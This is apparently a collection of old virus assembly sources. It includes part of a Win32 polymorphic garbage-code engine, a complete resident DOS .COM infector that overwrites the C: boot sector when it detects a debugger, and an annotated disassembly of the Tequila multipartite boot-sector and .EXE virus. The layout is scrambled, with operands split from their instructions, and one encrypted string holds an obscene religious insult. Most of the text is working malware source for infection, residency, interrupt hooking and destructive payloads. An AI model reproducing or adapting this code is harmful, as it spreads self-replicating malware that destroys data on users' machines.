and

eax,111b

cmp ja

byte ptr [ebp+offset pushtable+eax-start],0h savetomov ;yep

call

pushregister

;first push

call

gengarbage

;generate some garbage

call

randommov

;movs a value or register

call

gengarbage

;generate some garbage

call

popregister

;and pop it

jmp

exitgen

; eax <- al ;is the reg. pushed?

savetomov: call

randommov

jmp exitgen ;----------------------------------------------------------------------------;----------------------------------------------------------------------------; Generates random push ;----------------------------------------------------------------------------genpush: call getrndal

cmp je

al,4 genpush

and

eax,111b

call

pushregister

call

gengarbage

call

popregister

jmp exitgen ;----------------------------------------------------------------------------;----------------------------------------------------------------------------; Generates random inc ;----------------------------------------------------------------------------geninc: ;40 call getrndal cmp al,4 je geninc cmp ja

ah,80h genincdec

and

eax,111b

cmp ja

byte ptr [ebp+offset pushtable+eax-start],0h savetoinc

call

pushregister

call

gengarbage

add stosb

al,040h

call

gengarbage

sub

al,040h

call

popregister

jmp

exitgen

savetoinc: add stosb jmp genincdec: add stosb

;is the reg. pushed?

al,040h exitgen

al,40h

call

gengarbage

add stosb

al,8

jmp

exitgen

;inc

;dec

;-----------------------------------------------------------------------------

;----------------------------------------------------------------------------; Generates random dec ;----------------------------------------------------------------------------gendec: ;48 call getrndal cmp al,4 je gendec cmp ja

ah,80h gendecinc

and

eax,111b

cmp ja

byte ptr [ebp+offset pushtable+eax-start],0h savetodec

call

pushregister

call

gengarbage

add stosb

al,048h

call

gengarbage

sub

al,048h

call

popregister

jmp

exitgen

savetodec: add stosb jmp gendecinc: add stosb

;is the reg. pushed?

al,048h exitgen

al,48h

call

gengarbage

sub stosb jmp

al,8h exitgen

;----------------------------------------------------------------------------;----------------------------------------------------------------------------; Pushes register in al ;----------------------------------------------------------------------------pushregister: push eax inc

byte ptr [ebp+offset pushtable+eax-start]

add stosb

al,050h

;set flag for reg.

pop eax ret ;-----------------------------------------------------------------------------

;----------------------------------------------------------------------------; Pops register in al ;----------------------------------------------------------------------------popregister: push eax dec

byte ptr [ebp+offset pushtable+eax-start]

add stosb

al,058h

;unflag for reg.

pop eax ret ;----------------------------------------------------------------------------;----------------------------------------------------------------------------; Generates random add reg, value or add reg1,reg2 - reg = al ;----------------------------------------------------------------------------randomadd: push eax call

get_rnd32

cmp pop push ja

al,80h eax eax addregreg

call

randomaddvalue

pop ret

eax

rndaddb:

addregreg: call jmp

randomaddreg rndaddb

;-----------------------------------------------------------------------------

;----------------------------------------------------------------------------; Generates random add reg,value - reg = al ;-----------------------------------------------------------------------------

; 81 c0+reg value ; reg = eax 05 value randomaddvalue: push eax or jz

al,al addeax

xchg mov add

al,ah al,081h ah,0c0h

stosw backfromaddeax:

;reg = eax? ;special

call

get_rnd32

stosd pop ret

eax

mov stosb jmp

al,05h

addeax:

backfromaddeax

;----------------------------------------------------------------------------;----------------------------------------------------------------------------; Generates random add reg1,reg2 - reg1 = al ;----------------------------------------------------------------------------randomaddreg: push eax mov

bl,al

call

getrndal

shl

bl,3

or

al,bl

add mov xchg

al,0c0h ah,03h ah,al

;mix instructions

stosw pop eax ret ;-----------------------------------------------------------------------------

;----------------------------------------------------------------------------; Generates random sub reg, value or sub reg1,reg2 - reg = al ;----------------------------------------------------------------------------randomsub: push

eax

call

get_rnd32

cmp pop push ja

al,80h eax eax subregreg

call

randomsubvalue

pop ret

eax

rndsubb:

subregreg: call

randomsubreg

jmp

rndsubb

;-----------------------------------------------------------------------------

;----------------------------------------------------------------------------; Generates random sub reg,value - reg = al ;-----------------------------------------------------------------------------

; 81 c0+reg value ; reg = eax 05 value randomsubvalue: push eax or jz

al,al subeax

xchg mov add

al,ah al,081h ah,0e8h

;reg = eax? ;special

stosw backfromsubeax: call

get_rnd32

stosd pop ret

eax

mov stosb jmp

al,05h

subeax:

backfromsubeax

;----------------------------------------------------------------------------;----------------------------------------------------------------------------; Generates random sub reg1,reg2 - reg1 = al ;----------------------------------------------------------------------------randomsubreg: push eax mov

bl,al

call

getrndal

shl

bl,3

or

al,bl

add mov xchg

al,0c0h ah,03h ah,al

stosw pop

eax

;mix instructions

ret ;-----------------------------------------------------------------------------

;----------------------------------------------------------------------------; Generates a xor reg, value or xor reg, reg2 - reg = al ;----------------------------------------------------------------------------randomxor: push call cmp pop push ja

eax get_rnd32 al,80h eax eax xorvalue

call

randomxorreg

pop ret

eax

rndxorr:

xorvalue: call randomxorvalue jmp rndxorr ;-----------------------------------------------------------------------------

;----------------------------------------------------------------------------; Generates a random xor reg,reg2 - reg = al ;----------------------------------------------------------------------------randomxorreg: push eax ;6633 mov

bl,al

call

getrndal

shl

bl,3

or

al,bl

add mov

al,0c0h ah,033h

xchg

ah,al

;mix instructions

stosw pop eax ret ;-----------------------------------------------------------------------------

;----------------------------------------------------------------------------; Generates a random xor reg,value ;----------------------------------------------------------------------------randomxorvalue: push eax add

al,0f0h

mov

ah,081h

xchg

al,ah

stosw call

get_rnd32

stosd pop eax ret ;----------------------------------------------------------------------------;----------------------------------------------------------------------------; generates a random mov reg,value or reg,reg2 ;----------------------------------------------------------------------------randommov: push eax cmp jb

ah,080h movreg

call

randommovvalue

pop ret

eax

movback:

movreg: call randommovreg jmp movback ;----------------------------------------------------------------------------;----------------------------------------------------------------------------; Generates a random mov reg,value ;----------------------------------------------------------------------------randommovvalue: push eax add

al,0b8h

stosb call

get_rnd32

stosd pop ret

eax

;----------------------------------------------------------------------------; generates a random mov reg,reg2 ;----------------------------------------------------------------------------randommovreg: ;8b (c0+reg) or reg2 push eax mov bl,al call

getrndal

shl

bl,3

or

al,bl

xchg

ah,al

mov add

al,08bh ah,0c0h

;mix instructions

stosw pop ret

eax

;----------------------------------------------------------------------------; generates a random cmp reg,reg2 or cmp reg,value ;----------------------------------------------------------------------------gencmp: ;39/3b call get_rnd32 cmp jb

ah,0c0h gencmp

cmp ja

al,80h gencmpvalue

push

eax

call mov cmp ja add

get_rnd32 bh,039h al,80h gencmp1 bh,2

pop

eax

mov

al,bh

cld stosw jmp

exitgen

gencmp1:

gencmpvalue:

;81f8

and add

eax,0111b ax,081f8h

xchg

al,ah

stosw call

get_rnd32

stosd jmp

exitgen

;-----------------------------------------------------------------------------

;----------------------------------------------------------------------------; Generate junk f8 - fd ;----------------------------------------------------------------------------genjunk:

call cmp jb cmp ja

get_rnd32 al,0f8h genjunk al,0fdh genjunk

stosb jmp exitgen ;-----------------------------------------------------------------------------

getrndal: call and ret

get_rnd32 al,111b

rdtcs



equ

get_rnd32: push push push push push

;main part by GriYo / 29A ecx ebx edx edi esi

mov mov imul add mov

eax,dword ptr [ebp+rnd32_seed-start] ecx,eax eax,41C64E6Dh eax,00003039h dword ptr [ebp+rnd32_seed-start],eax

xchg rdtcs xchg xor

eax,ecx

pop pop pop pop pop ret

esi edi edx ebx ecx

;just 4 some xtra randomness eax,ecx eax,ecx

polyend: db

"(c)"

;just some junk

end: ;----------------------------------------------------------------------------;

pointertope

dd

?

if debug eq 1 death endif

dd

?

;kill ourself flag

busy filename peheader whereappend pushtable

dd db db dd db

? 100h dup (0h) 1024 dup (0h) ? 8 dup (0h)

viruscopy

db

(virusz+1000) dup (0h)

;virussize + poly

memend: _CODE

ends

;----------------------------------------------------------------------------; ;----------------------------------------------------------------------------; _DATA segment dword use32 public 'DATA' fill db ? _DATA ends _burp segment dword use32 public 'LiFEwiRE' fill2 db ? _burp ends ;----------------------------------------------------------------------------; end end

start

; Resident .COM midfile infector - 666 bytes - 02/2000 by T-2000/IR. ; Uses the INT 21h ISR to locate a suitable place to put the CALL_Virus.

Virus_Size Virus_Size_Mem

.286 .MODEL .CODE

TINY

EQU EQU

(End_Body-START) (((End_Heap-START)+15)/16)

START:

; ; ;

PUSHF PUSHA PUSH PUSH

; Save registers. DS ES

CALL

Get_IP

Encrypted with XOR 66h: "If Jesus was fucked to death, all xtians would be wearing tiny dildo's" (pardon my sense of humour :)

Message

DB DB DB DB DB DB DB DB DB DB DB

6Bh, 15h, 46h, 46h, 12h, 46h, 46h, 04h, 0Fh, 1Fh, 41h,

6Ch, 13h, 00h, 12h, 0Eh, 1Eh, 11h, 03h, 08h, 46h, 15h,

2Fh, 15h, 13h, 09h, 4Ah, 12h, 09h, 46h, 01h, 02h, 6Bh,

00h, 46h, 05h, 46h, 46h, 0Fh, 13h, 11h, 46h, 0Fh, 6Ch,

46h, 11h, 0Dh, 02h, 07h, 07h, 0Ah, 03h, 12h, 0Ah, 61h,

2Ch, 07h, 03h, 03h, 0Ah, 08h, 02h, 07h, 0Fh, 02h, 66h

03h 15h 02h 07h 0Ah 15h 46h 14h 08h 09h

Get_IP:

POP SUB

SI SI, (Message-START)

; Calculate delta offset.

MOV INT

AH, 30h 21h

; Get DOS version.

CMP JB

AL, 4 Restore_Host

; We need DOS 4.xx or above.

MOV INT

AX, 2000h 21h

; Virus residency check.

XCHG JCXZ

CX, AX Restore_Host

; Already up there? ; Then abort further install.

MOV INT

AH, 43h 68h

; Soft-Ice residency check.

CMP JZ

AX, 0F386h Trash_Boot

; Active?

; (This works in Win32 aswell tho you have to encapsulate it ; with a SEH as the INT 68h will GPF if Soft-Ice ain't loaded). Alloc_Memory:

XOR

CX, CX

Alloc_Block:

MOV MOV INT

AH, 48h BX, Virus_Size_Mem 21h

; Attempt to allocate memory.

Init_Block:

Restore_Host:

Host_Byte

JNC

Init_Block

DEC JNP

CX Restore_Host

; CX = -1 ; Endless loop?

MOV MOV INT

AH, 4Ah BX, CX 21h

; Get blocksize of ES.

MOV SUB INT JNC

AH, 4Ah BX, Virus_Size_Mem+1 21h Alloc_Block

; Create room for the virus.

JMP

Restore_Host

; And attempt allocation.

MOV

ES, AX

; ES = allocated block.

DEC MOV

AX DS, AX

; DS = MCB allocated block.

XOR

DI, DI

MOV

WORD PTR DS:[DI+1], 8

; Disguise block as system.

MOV SEGCS REP

CX, (Virus_Size/2)

; Copy viruscode up there.

PUSH

ES

MOV INT

AX, 3521h 21h

PUSH POP

ES DS

MOV MOV INT

AX, 2566h DX, BX 21h

POP

DS

MOV

Busy_Switch, CL

; Clear busy flag.

MOV MOV INT

AL, 21h DX, OFFSET New_Int21h 21h

; Hook INT 21h.

PUSH POP

SS ES

; So we can STOS to SS.

MOV

BP, SP

; Setup stack pointer.

MOV

DI, [BP+(11*2)]

; CALL_Virus return address.

SUB

DI, 3

; Offset of CALL_Virus.

MOV

[BP+(11*2)], DI

; Re-execute it later.

MOV = NOT

AL, NOT 0C3h BYTE PTR $-1 AL

; Encrypted original byte.

MOVSW

; Get INT 21h.

; Revector it to INT 66h.

; Decrypt byte.

STOSB

Host_Word

; Restore byte in memory.

MOV = INC STOSW

AX, 9090h-1 WORD PTR $-2 AX

; Encrypted original word.

POP POP POPA POPF

ES DS

; Restore original registers.

RETN

; Decrypt word. ; Restore word in memory.

; And re-execute, fixed code.

Trash_Boot: MOV MOV XOR SEGCS INT

AL, 2 CX, 1 DX, DX

; Trash the bootsector of C:.

INT

19h

; Reboot the system.

CMP JNE

AX, 2000h Check_Exit

; Virus residency call.

; Stupid anti-TBClean trick. 26h

New_Int21h:

Check_Exit:

Check_Timer:

Display_Char:

CBW

; AX = 0.

IRET

; And return.

PUSHA PUSH PUSH

DS ES

; Save all regs.

OR JZ

AH, AH Check_Timer

; Program terminate?

CMP JNE

AH, 4Ch Check_Debugger

; Program terminate?

IN

AX, 40h

; Get a random value.

ADD JNZ

AL, AH Check_Debugger

; 1/256 chance of displaying ; text message.

MOV MOV

AH, 0Eh SI, OFFSET Message

SEGCS LODSB

; Fetch next encrypted byte.

XOR JZ

AL, 66h Check_Debugger

; Displayed all so far? ; Then bail.

INT

10h

; BIOS display character.

JMP

Display_Char

; Go on.

Check_Debugger: XOR

DI, DI

MOV LDS LODSB

DS, DI SI, DS:[DI+(01h*4)]

; Get 1st instruction of ; INT 01h.

MOV

AH, AL

; Save it in AH.

MOV LDS LODSB

DS, DI SI, DS:[DI+(03h*4)]

; Get 1st instruction of ; INT 03h.

XOR JNZ

AX, 0CFCFh Trash_Boot

; if they're not IRET then ; a debugger has hooked them.

Check_Caller:

INT

01h

; Annoying break.

JMP =

$ BYTE PTR $-1

; Bail if we're busy already.

Busy_Switch

INC JS JP

CS:Int_Count Exit_ISR Exit_ISR

; Only examine INTs randomly ; to prevent slowdowns.

MOV MOV

BP, SP DS, [BP+(11*2)]

; DS = CS of calling INT 21h.

XCHG

SI, AX

; SI = 0.

CMP JNE

DS:[SI], 20CDh Exit_ISR

; Verify it's a .COM-PSP.

; Set the busy flag so we don't get interrupted.

Scan_For_Name:

MOV

CS:Busy_Switch, (Exit_ISR-Busy_Switch)-1

MOV INT

AH, 62h 66h

; Get current PSP.

CMP JNE

BX, [BP+(11*2)] Clear_Busy

; Caller's CS == PSP ? ; Else it ain't no .COM.

IN ADD

AX, 40h AL, AH

; Get a random number.

CMP JNB

AL, 150 Clear_Busy

; Infect the program here? ; Nope, maybe next time.

MOV

DS, DS:[SI+2Ch]

; .COM's environment block.

LODSW DEC

; ; ; ; ;

Scan for the end of all settings, after which the full path to the currently executing program resides.

SI

OR JNZ

AX, AX Scan_For_Name

CALL

Infect_File

Clear_Busy:

AND

CS:Busy_Switch, 0

; Open for business again..

Exit_ISR:

POP POP POPA

ES DS

; Restore the regs.

Do_Old_Int21h:

INT

66h

; Call the original INT 21h.

RETF

2

; And return with new flags.

MOV XOR CWD INT

AX, 4202h CX, CX

; Seek to the end of file.

DB

0CDh, 03h

; Annoying break.

MOV LEA INT JC

AX, 4300h DX, [SI+3] 66h Do_RETN

; Get file's attributes.

IN OR OUT

AL, 21h AL, 00000010b 21h, AL

; Lock the keyboard.

INT

01h

; Hang the possible debugger.

PUSH PUSH PUSH

DS DX CX

; Save path and attributes.

AND JZ

CL, 00000110b Clear_Readonly

; Leave system & hidden files ; alone (and clear r/o bit).

JMP

Nop_Attr_Rest

; Fix stack but don't restore ; attributes.

AX, 4301h 66h JMP_Nop_Attr

; Clear possible r/o bit.

MOV INT JNC

AX, 3D02h 66h Save_Handle

; Open file for read/write.

JMP

Restore_Attr

XCHG

BX, AX

PUSH POP

CS DS

MOV

SI, OFFSET Header

MOV MOV MOV INT JNC

AH, 3Fh CL, 4 DX, SI 66h Verify_Read

Seek_EOF:

Do_RETN:

66h

RETN

Infect_File:

JMP_Nop_Attr:

Clear_Readonly: MOV INT JC

Save_Handle:

JMP_Close_File: JMP

Close_File

Verify_Read:

AX, CX

CMP

; Save filehandle in BX.

; Read first 4 bytes of .COM.

; All 4 bytes we're read?

JNE

JMP_Close_File

CALL

Seek_EOF

; Get filesize.

DEC JNS

DX JMP_Close_File

; .COM is over 64k ? ; Then bail, obviously.

CMP JA

AX, (63*1024) JMP_Close_File

; .COM is too big?

CMP JB

AX, (4*1024) JMP_Close_File

; Or too small?

INC JZ

WORD PTR [SI+2] JMP_Close_File

; Don't infect .SYS-files.

CMP JE

[SI], 'ZM'+1 JMP_Close_File

; Ditto for .EXE-files.

CMP JE

[SI], 'MZ'+1 JMP_Close_File

MOV DEC MOV INT

AX, 4202h CX DL, -7 66h

; ; ; ;

Seek to the last 7 bytes of the .COM-file, this is where the possible ENUNS-string is located.

; My Win98 .COM-files have the ENUNS changed to NLDNS, so just ; checking for ENUNS would not work with these. Just treath every ; .COM-file as a ENUNS protected file and you're all set. MOV MOV MOV INT

AH, 3Fh CX, 7 DX, OFFSET Checksum_ID 66h

; Adjust the file's checksum. ADD

Checksum_Word, Virus_Size

CALL

Seek_EOF

LES

DI, [BP+(2*10)]

MOV DEC

DX, DI DH

; Minus PSP (100h).

CMP JNB

DX, AX JMP_Close_File

; IP points into the image? ; Else bail out.

SUB SUB

AX, DX AX, 3

; Calculate displacement.

MOV

BP, OFFSET CALL_Virus

MOV

CS:[BP+1], AX

PUSH

DX

MOV XOR INT

AX, 4200h CX, CX 66h

; ES:DI = CS:IP of the next ; instruction in the target.

; CALL_Virus displacement.

; Seek to the insert offset.

Restore_Date:

MOV

SI, OFFSET Header

MOV MOV MOV INT

AH, 3Fh CL, 3 DX, SI 66h

POP

DX

; Read the original bytes.

CMPSB JNE

Close_File

; Code in memory is the same ; as on disk?

CMPSW JNE

Close_File

; This avoids infecting ; packed files, etc.

SUB

SI, 3

LODSB NOT MOV

AL Host_Byte, AL

LODSW DEC MOV

AX Host_Word, AX

MOV XOR INT

AX, 4200h CX, CX 66h

; Seek to the insert offset ; again.

MOV INT JC

AX, 5700h 66h Close_File

; Get file's date & time.

MOV AND

AL, CL AL, 00011111b

; Mask-out seconds.

CMP JE

AL, (6/2) Close_File

; 6 seconds (infected) ? ; Then abort.

XCHG

CX, AX

; Put CX in AX.

AND OR

AL, 11100000b AL, (6/2)

; Clear seconds field. ; Set 6 seconds.

PUSH PUSH

AX DX

; Save the file date & time ; on the stack for later.

MOV MOV MOV INT JC

AH, 40h CX, 3 DX, BP 66h Restore_Date

; Write the CALL_Virus into ; the file.

CALL

Seek_EOF

MOV MOV INT

AH, 40h CX, Virus_Size 66h

; Append virusbody to the ; target file. (DX=0).

MOV POP POP

AX, 5701h DX CX

; Restore file date & time.

; Get 1st byte, encrypt and ; save it.

; Do the same with the next ; word.

INT

66h

Close_File:

MOV INT

AH, 3Eh 66h

; Close the file.

Restore_Attr:

MOV CMP ORG MOV POP POP POP INT

AX, 4301h AX, 0 $-2 AH, 19h CX DX DS 66h

; Restore file's attributes.

CMP XOR DEC PUSH POP CMP

AX, 545Bh CH, [BX] CX DX BP AX, 0DEADh

; Executable text string, ; '=[T2/IR]='. Very effective ; against lame text patching.

IN XOR OUT

AL, 21h AL, 00000010b 21h, AL

; Reverse state of keyboard, ; it'll lock if a debugger ; has skipped the 1st lock.

INT

03h

; Hang the possible debugger.

Nop_Attr_Rest:

Exit_Infect:

; Nop (get current drive).

RETN CALL_Virus

DB DW

0E8h 0

; CALL opcode.

Checksum_ID Checksum_Word

DB DW

5 DUP(0) 666

; Usually 'ENUNS'. ; Checksum itself.

Int_Count Header

DB DB

0 4 DUP(0)

End_Heap:

; ; ; ;

End_Body:

So it's lame.. a lame virus for a lame person.. Haven't bothered optimizing the code structure to the max, no time nor desire, sorry.. Remember, this is just a demonstration virus....

; Amen. END

START

; ; ; ;

Tequila.2468.A (exact) disasm. Multipartite semi-stealth polymorphic MBS & .EXE-infector. Bugs marked with '***'. T-2000/IR, March 2000. .MODEL .STACK .CODE

TINY 512

EQU EQU EQU EQU

(End_Body-START) ((End_Body-START)+511)/512 ((End_Body-START)+1023)/1024 ((End_Heap-START)+15)/16

Host_IP Host_CS Host_SS

DW DW DW

OFFSET Carrier (256/16) (256/16)

Infect_Year Infect_MD

DW DW

0 0

; Year of MBS infection. ; Month & day of MBS infection.

Tunnel_Success

DB

0

; DOS' INT 13h found boolean.

Word_16 Word_512 Word_250 Byte_12

DW DW DW DB

16 512 250 12

; Used for MUL/DIV operations.

Message

DB DB DB DB DB

0Dh, 0Ah, 0Dh, 0Ah 'Welcome to T.TEQUILA''s latest production.', 0Dh, 0Ah 'Contact T.TEQUILA/P.o.Box 543/6312 St''hausen/Switzerland.', 0Dh, 0Ah 'Loving thoughts to L.I.N.D.A', 0Dh, 0Ah, 0Dh, 0Ah 'BEER and TEQUILA forever !', 0Dh, 0Ah, 0Dh, 0Ah, '$'

Hint

DB

'Execute: mov ax, FE03 / int 21. Key to go on!'

Virus_Size Virus_Size_512 Virus_Size_1024 Virus_Size_Mem START:

; ; ; ;

Tequila's activation routine, it's supposed to activate on the same day as the MBS infection took place, 3 or more months later, when it will draw a colorful mandelbrot set consisting out of ASCII characters, and display a message.

Check_Activate: PUSH BP MOV SUB PUSH PUSH PUSH PUSH PUSH PUSH PUSH PUSH

AX BX CX DX SI DI ES DS

PUSH POP DS

CS

MOV

BP, SP SP, (6*2)

; Reserve 12 bytes on the ; stack.

AX, Infect_Year

; Year of MBS infection.

INC JZ

AX JMP_Exit_Act

; Skip all further checks? ; Yep.

DEC JNZ

AX Check_Date

; We're in countdown mode? ; Nope.

DEC JNZ

Infect_MD JMP_Exit_Act

; 3 program exits so far? ; Else bug out.

JMP

Init_Video_Seg

; Do the effect.

MOV CALL

AH, 2Ah Do_Old_Int21h

; Get the current date.

MOV

SI, CX

; SI = year count.

MOV

CX, Infect_MD

CMP JNE

CL, DL Disable_Check

; Same day as infection?

MOV

AX, SI

; AX = current year count.

SUB

AX, Infect_Year

; Minus the year count of ; MBS infection.

MUL

Byte_12

; Calculate total count of ; months in year count.

ADD

AL, DH

; Plus current month. ; AL = amount of months since ; MBS infection took place.

ADD

CH, 3

; Infection date + 3 months.

CMP JAE

AL, CH Enable_Call

; 3 months have passed? ; Then enable the payload.

Disable_Check:

MOV JMP

Infect_Year, -1 JMP_Exit_Act

; Don't check the date ; anymore.

Enable_Call:

MOV

Infect_Year, 0

; Signal that the payload ; can activate and the 0FE03h ; call can be accepted.

MOV

Infect_MD, 3

; Countdown timer, wait 3 ; program exits before ; activation.

JMP

Exit_Activate

Check_Date:

JMP_Exit_Act:

Init_Video_Seg: MOV

Set_Video_Seg:

BX, 0B800h

; VGA video segment.

INT

11h

; Get equipment status.

AND

AX, 0000000000110000b

; Mask out video state.

CMP JNE

AX, 0000000000110000b Set_Video_Seg

; 80x25 monochrome?

MOV

BX, 0B000h

; Monochrome video segment.

MOV

ES, BX

; I didn't bother commenting the effect as I don't have a clue of what the ; fuck it's doing. Besides, graphical payloads are for lamers anyways.... XOR

BX, BX

MOV

DI, 0FD8Fh

LOC_9:

MOV

SI, 0FC18h

LOC_10:

MOV MOV

[BP-(1*2)], SI [BP-(2*2)], DI

MOV

CX, 30

MOV AX

AX,[BP-(1*2)] ; dx:ax = reg * ax

MOV MOV

[BP-(4*2)], AX [BP-(3*2)], DX

MOV AX

AX, [BP-(2*2)] ; dx:ax = reg * ax

MOV MOV

[BP-(6*2)], AX [BP-(5*2)], DX

ADD ADC

AX, [BP-(4*2)] DX, [BP-(3*2)]

CMP JAE

DX, 15 LOC_12

MOV IMUL IDIV

AX, [BP-(1*2)] WORD PTR [BP-(2*2)] ; dx:ax = data * ax Word_250 ; ax,dxrem=dx:ax/data

ADD MOV

AX, DI [BP-(2*2)], AX

MOV MOV

AX, [BP-(4*2)] DX, [BP-(3*2)]

SUB SBB IDIV

AX, [BP-(6*2)] DX, [BP-(5*2)] Word_512

ADD MOV

AX, SI [BP-(1*2)], AX

LOOP

LOCLOOP_11

INC SHR

CX CL, 1

MOV MOV MOV

CH, CL CL, 0DBh ES:[BX], CX

ADD

SI, 18

LOCLOOP_11: IMUL

IMUL

LOC_12:

INC BX INC BX

Write_Char:

Exit_Activate: POP ES POP DI POP SI POP DX POP CX POP BX POP AX

CMP JL

SI, 1B8h LOC_10

ADD

DI, 52

CMP JL

DI, 2A3h LOC_9

XOR MOV MOV CLD

DI, DI ; Display the hint on screen. SI, OFFSET Hint CX, (Check_Activate-Hint)

MOVSB INC

DI

; Put a byte in video RAM. ; Don't change the attribute.

LOOP

Write_Char

; Do the entire string.

XOR INT

AX, AX 16h

; Wait for a keypress.

POP

DS

MOV

SP, BP

POP BP RETN

; This displays Tequila's message. Display_Message: PUSH DX PUSH DS PUSH POP DS

CS

MOV MOV CALL

AH, 09h DX, OFFSET Message Do_Old_Int21h

; Display string.

POP DS POP DX RETN

; This get's inserted into MBS'ses. MBS_Loader: CLI XOR MOV

BX, BX DS, BX

; Zero DS.

MOV MOV

SS, BX SP, 7C00h

; Setup a stack.

STI XOR

DI, DI

; Steal 3k of DOS memory to go resident into. SUB INT

WORD PTR DS:[413h], Virus_Size_1024 12h

MOV SHL

CL, 6 AX, CL

; Calculate segment to go ; resident into.

MOV ES

ES, AX

; Push relocated address.

PUSH

MOV AX

AX, OFFSET Relocated_Boot

PUSH

; Read the virusbody off disk. MOV MOV

AX, 0200h+Virus_Size_512 CX, DS:[7C00h+(Home_ST-MBS_Loader)]

MOV INT

DX, DS:[7C00h+(Home_HD-MBS_Loader)] 13h

INC CX

RETF

; Jump to the relocated code.

ID_Word

DW

0FE02h

; Already-infected-tag.

Home_ST Home_HD

DW DW

0 0

; Sector/track of virusbody. ; Head/drive of virusbody.

Relocated_Boot: PUSH POP

CS DS

XOR MOV

AX, AX ES, AX

MOV

BX, 7C00h

PUSH PUSH

ES BX

; ES:BX = 0000:7C00, boot ; address.

MOV MOV MOV INT

AX, 0201h CX, Home_ST DX, Home_HD 13h

; Read the original MBS from ; disk.

PUSH POP

CS ES

; ; ; ;

; Zero ES.

Create a copy of the INT 13h ISR, and the body encryptor & appender, as the virus will encrypt the runtime code when it infects a file so it doesn't have to use a seperate buffer.

CLD MOV MOV MOV REP

SI, OFFSET New_Int13h DI, OFFSET New_Int13h_Copy CX, (New_Int1Ch-New_Int13h) MOVSB

MOV MOV MOV REP

SI, OFFSET Append_Body_Encrypted DI, OFFSET Append_Body_Encrypted_Copy CX, (Decryptor-Append_Body_Encrypted) MOVSB

CLI XOR MOV

AX, AX ES, AX

; ES = IVT.

LES

BX, ES:[(1Ch*4)]

; Get INT 1Ch (timer).

MOV MOV

Old_Int1Ch, BX Old_Int1Ch+2, ES

; Save INT 1Ch.

MOV

ES, AX

; ES = IVT.

LES

BX, ES:[(21h*4)]

; Get INT 21h.

MOV MOV

Old_Int21h, BX Old_Int21h+2, ES

; Save INT 21h aswell.

MOV

ES, AX

; ES = IVT.

; Hook INT 1Ch. MOV MOV

ES:[(1Ch*4)], OFFSET New_Int1Ch ES:[(1Ch*4)+2], DS

STI RETF

; Jump to the original MBS.

; This is where the polymorphic decryptor jumps ; to after it's done decrypting the virusbody. Init_Virus: Get_IP:

PUSH PUSH PUSH POP DS

CALL POP SUB

Get_IP SI SI, OFFSET Get_IP

; Calculate the virus' ; delta offset in this CS.

PUSH AX ES

SI

; Save some needed registers.

AX, ES

; AX = current PSP.

CS

MOV

; Add the effective segment (PSP) to the segment values. ADD ADD

[SI+(Host_CS-START)], AX [SI+(Host_SS-START)], AX

DEC MOV

AX ES, AX

; Get the host's MCB in ES.

MOV INT

AX, 0FE02h 21h

; Virus' residency check.

CMP JE

AX, NOT 0FE02h Run_Host

; Virus is already installed? ; Then just bail to the host.

CMP JNE

BYTE PTR ES:[0], 'Z' Run_Host

; ; ; ;

Make sure this block is the last one in the chain, else higher blocks might get damaged.

; Make sure the memory block holds enough ; space to put the viruscode in. CMP JBE

WORD PTR ES:[3], Virus_Size_Mem Run_Host

MOV SUB

AX, ES:[12h] AX, Virus_Size_Mem

; PSP:[2], holds TOM segment. ; Minus the virus' size to ; get the virus segment.

MOV

ES, AX

; Virus segment.

XOR MOV CLD REP

DI, DI CX, Virus_Size

; Relocate the viruscode to ; the newly calculated ; unused segment.

PUSH

ES

; DS = virus segment.

CALL

Infect_MBS

; Infect the 1st MBS.

POP POP

ES AX

; Restore ES (PSP). ; Restore AX (FCB status).

PUSH

ES

; DS=ES=PSP.

POP

SI

; Restore virus delta offset.

MOVSB

POP DS

Run_Host:

POP DS

; Restore the host's original SS. MOV

SS, CS:[SI+(Host_SS-START)]

; And jump to the host's original entrypoint. JMP

DWORD PTR CS:[SI+(Host_IP-START)]

MOV INT

AH, 2Ah 21h

; Get the current date.

MOV MOV

Infect_Year, CX Infect_MD, DX

; Store date of infection.

MOV INT

AH, 52h 21h

; Get M$-DOS list of lists. ; (undocumented).

MOV MOV

AX, ES:[BX-2] First_MCB, AX

; Get segment of 1st MCB. ; And save it for tunneler.

MOV INT

AX, 3513h 21h

; Get INT 13h.

Infect_MBS:

MOV MOV

Old_Int13h, BX Old_Int13h+2, ES

; Save INT 13h.

MOV INT

AX, 3501h 21h

; Get INT 01h.

MOV MOV

SI, BX DI, ES

; Save INT 01h in DI:SI.

MOV MOV INT

AX, 2501h DX, OFFSET New_Int01h 21h

; Put in the tunneler.

MOV

Tunnel_Success, 0

; Initialize as 'not found'.

PUSHF

; Set the trapflag (TF).

POP AX PUSH

PUSH POP ES

OR AX POPF

AX, 100h

MOV MOV MOV MOV

AX, BX, CX, DX,

; Read the MBS of HD 1.

DS

PUSHF CALL

PUSH

0201h OFFSET Buffer 1 80h

PUSHF POP AND AX POPF

; Call INT 13h while tracing. DWORD PTR Old_Int13h

AX AX, NOT 100h

; Disable the TF incase ; INT 13h wasn't found.

PUSHF

Check_MBS: POP DS

MOV MOV MOV INT

AX, 2501h DX, SI DS, DI 21h

POPF JNC

Check_MBS

JMP

Exit_Inf_MBS

PUSH

ES

; Restore original INT 01h.

; Flags after the MBS read. ; If error, then bail out.

; ES = virus segment.

; Check if the MBS is already infected. CMP JNE

[BX+(ID_Word-MBS_Loader)], 0FE02h Find_DOS_Part

JMP

Exit_Inf_MBS

; This locates a DOS partition. Find_DOS_Part:

ADD

BX, 1BEh

; BX = begin partition table.

MOV

CX, 4

; Maximum of 4 partitions.

Scan_Partition: MOV

AL, [BX+4]

; Get the partition's system ; indicator.

CMP JE

AL, 4 Store_Home

; DOS 16-bit FAT ?

CMP JE

AL, 6 Store_Home

; DOS > 32M ?

CMP JE

AL, 1 Store_Home

; DOS 12-bit FAT ?

ADD

BX, 16

; Next partition.

LOOP

Scan_Partition

; Loop to the next partition.

JMP

Exit_Inf_MBS

; None found.

MOV MOV

DL, 80h DH, [BX+5]

; First harddisk. ; Last head of DOS partition.

MOV

Home_HD, DX

; Store virus' home ; drive & head.

MOV

AX, [BX+6]

; Last sector & track of ; DOS partition.

MOV MOV

CX, AX SI, Virus_Size_512+1

AND

AX, 0000000000111111b

; Strip track count to get ; the last track sector.

CMP JBE

AX, SI Exit_Inf_MBS

; There's enough space on ; this track for the virus?

SUB

CX, SI

; Steal needed sectors from ; the partition's last track.

MOV

DI, BX

MOV

Home_ST, CX

MOV MOV

AX, 0301h BX, OFFSET Buffer

PUSHF CALL JC

DWORD PTR Old_Int13h Exit_Inf_MBS

DEC MOV

CX [DI+6], CX

